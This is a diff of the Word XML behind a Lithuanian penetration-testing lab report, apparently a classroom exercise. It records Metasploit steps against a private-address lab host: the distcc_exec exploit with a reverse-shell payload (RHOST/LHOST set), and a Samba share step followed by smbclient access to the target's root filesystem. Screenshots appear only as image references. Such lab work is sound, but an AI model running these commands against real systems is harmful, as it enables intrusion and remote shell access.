-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">msf &gt; </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>use exploit/unix/misc/distcc_exec</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">msf  exploit(distcc_exec) &gt; </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>set RHOST IP</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">msf  exploit(distcc_exec) &gt; </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>exploit</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>(galima pateikti darbalaukio atvaizdą)</w:t>
-      </w:r>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblW w:w="0" w:type="auto"/>
-        <w:tblInd w:w="1" w:type="dxa"/>
-        <w:tblLayout w:type="fixed"/>
-        <w:tblCellMar>
-          <w:left w:w="0" w:type="dxa"/>
-          <w:right w:w="0" w:type="dxa"/>
-        </w:tblCellMar>
-        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="3420"/>
-        <w:gridCol w:w="6030"/>
-      </w:tblGrid>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="368"/>
+          <w:trHeight w:val="431"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3420" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-            </w:tcBorders>
-            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>Atliktas veiksmas</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6030" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-            </w:tcBorders>
-            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>Rezultatas (paslaugos, prievadai)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="327"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3420" w:type="dxa"/>
-            <w:tcBorders>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t>msfconsole</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6030" w:type="dxa"/>
-            <w:tcBorders>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
+            <w:tcW w:w="3240" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>set SMBSHARE tmp</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6210" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:noProof/>
               </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="033464BD" wp14:editId="45E05333">
-                  <wp:extent cx="3524652" cy="3152775"/>
-                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                  <wp:docPr id="36" name="Picture 36"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="363FDCA8" wp14:editId="4B00DDD1">
+                  <wp:extent cx="3994150" cy="274320"/>
+                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
+                  <wp:docPr id="43" name="Picture 43"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -12038,7 +12075,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="3574538" cy="3197397"/>
+                            <a:ext cx="3994150" cy="274320"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -12055,77 +12092,65 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="327"/>
+          <w:trHeight w:val="1439"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3420" w:type="dxa"/>
-            <w:tcBorders>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+            <w:tcW w:w="3240" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
               <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>Use</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>exploit/unix/misc/distcc_exec</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6030" w:type="dxa"/>
-            <w:tcBorders>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>exploit</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6210" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
               <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
+              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:noProof/>
               </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="021589C8" wp14:editId="0F537C73">
-                  <wp:extent cx="3124200" cy="171450"/>
-                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                  <wp:docPr id="35" name="Picture 35"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D3CEDD2" wp14:editId="157C6895">
+                  <wp:extent cx="3994150" cy="908050"/>
+                  <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
+                  <wp:docPr id="44" name="Picture 44"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -12145,7 +12170,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="3124200" cy="171450"/>
+                            <a:ext cx="3994150" cy="908050"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -12162,84 +12187,65 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="327"/>
+          <w:trHeight w:val="1331"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3420" w:type="dxa"/>
-            <w:tcBorders>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+            <w:tcW w:w="3240" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
               <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>set RHOST 192.168.</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>177</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>.1</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>28</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6030" w:type="dxa"/>
-            <w:tcBorders>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>exit</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6210" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
               <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
+              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:noProof/>
               </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58313608" wp14:editId="72F2BDA0">
-                  <wp:extent cx="3827780" cy="252095"/>
-                  <wp:effectExtent l="0" t="0" r="1270" b="0"/>
-                  <wp:docPr id="34" name="Picture 34"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14347706" wp14:editId="3BC6D854">
+                  <wp:extent cx="3937000" cy="784225"/>
+                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
+                  <wp:docPr id="45" name="Picture 45"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -12259,7 +12265,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="3827780" cy="252095"/>
+                            <a:ext cx="3937000" cy="784225"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -12276,63 +12282,93 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="327"/>
+          <w:trHeight w:val="1349"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3420" w:type="dxa"/>
-            <w:tcBorders>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+            <w:tcW w:w="3240" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
               <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>set payload cmd/unix/reverse</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6030" w:type="dxa"/>
-            <w:tcBorders>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>smbclient //192.168.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>177</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>.1</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>28</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>/tmp</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6210" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
               <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
+              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:noProof/>
               </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71F2E33B" wp14:editId="0E0432C4">
-                  <wp:extent cx="3827780" cy="212090"/>
-                  <wp:effectExtent l="0" t="0" r="1270" b="0"/>
-                  <wp:docPr id="33" name="Picture 33"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09C95E33" wp14:editId="0D2F819A">
+                  <wp:extent cx="3590925" cy="828675"/>
+                  <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
+                  <wp:docPr id="46" name="Picture 46"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -12352,7 +12388,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="3827780" cy="212090"/>
+                            <a:ext cx="3590925" cy="828675"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -12369,63 +12405,64 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="327"/>
+          <w:trHeight w:val="611"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3420" w:type="dxa"/>
-            <w:tcBorders>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+            <w:tcW w:w="3240" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
               <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>set LHOST 192.168.177.129</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6030" w:type="dxa"/>
-            <w:tcBorders>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>cd rootfs</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6210" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
               <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
+              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:noProof/>
               </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48EF32CF" wp14:editId="1B7D1388">
-                  <wp:extent cx="3827780" cy="306705"/>
-                  <wp:effectExtent l="0" t="0" r="1270" b="0"/>
-                  <wp:docPr id="32" name="Picture 32"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44DE0726" wp14:editId="14C51F7D">
+                  <wp:extent cx="1676400" cy="361950"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="47" name="Picture 47"/>
                   <wp:cNvGraphicFramePr>
